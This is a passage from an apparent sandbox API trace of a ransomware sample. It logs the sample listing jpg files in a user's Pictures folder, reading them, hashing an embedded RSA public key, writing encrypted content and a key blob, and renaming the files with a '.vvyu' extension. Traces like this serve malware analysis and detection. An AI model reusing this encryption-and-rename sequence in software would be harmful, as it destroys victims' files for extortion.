0x2c78b10 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c48 [0195.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c18 [0195.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ca8 [0195.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0195.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c78 [0195.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c60 [0195.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cc0 [0195.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c60 [0195.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0195.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0195.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c30 [0195.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea4a68 [0195.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0195.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea4c78 [0195.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0195.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0195.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea4e90 [0195.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4c78 | out: hHeap=0x620000) returned 1 [0195.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e90 | out: hHeap=0x620000) returned 1 [0195.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0195.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0195.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0195.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea12a8 | out: hHeap=0x620000) returned 1 [0195.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.093] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xfb99, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xfb99, lpOverlapped=0x0) returned 1 [0195.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.094] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xfb9e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.094] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea4a68 [0195.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea4a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea4e98 [0195.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.096] WriteFile (in: hFile=0x568, lpBuffer=0x2ea4e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea4e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e98 | out: hHeap=0x620000) returned 1 [0195.096] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.096] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.096] CloseHandle (hObject=0x568) returned 1 [0195.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea4a68 [0195.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.098] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\n-nH-E2t.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\n-nh-e2t.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\n-nH-E2t.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\n-nh-e2t.jpg.vvyu")) returned 1 [0195.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.110] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.113] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ffba840, ftCreationTime.dwHighDateTime=0x1d8996c, ftLastAccessTime.dwLowDateTime=0xf72e6a00, ftLastAccessTime.dwHighDateTime=0x1d8a11c, ftLastWriteTime.dwLowDateTime=0xf72e6a00, ftLastWriteTime.dwHighDateTime=0x1d8a11c, nFileSizeHigh=0x0, nFileSizeLow=0x134b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O_9gyTeSlm.jpg", cAlternateFileName="O_9GYT~1.JPG")) returned 1 [0195.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea12a8 [0195.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea12a8 | out: hHeap=0x620000) returned 1 [0195.114] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\O_9gyTeSlm.jpg") returned=".jpg" [0195.114] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\O_9gyTeSlm.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\o_9gyteslm.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.115] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=79030) returned 1 [0195.115] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.118] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x13490, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.118] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.120] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.120] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x134b6, lpOverlapped=0x0) returned 1 [0195.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.121] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.122] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.122] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.122] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.122] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.122] GetLastError () returned 0x0 [0195.123] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.123] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.123] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.123] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.123] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x134c0) returned 0x2ea79b0 [0195.124] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea12a8 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c00 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea12f0 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c18 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c48 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ca8 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c60 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.124] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea4a68 [0195.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0195.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ca8 [0195.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0195.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c60 [0195.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2c48 [0195.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0195.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0195.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0195.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0195.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0195.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.127] GetCurrentThreadId () returned 0x66c [0195.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea0580 [0195.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0195.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.128] GetCurrentThreadId () returned 0x66c [0195.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ca8 [0195.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.129] RtlAllocateHeap 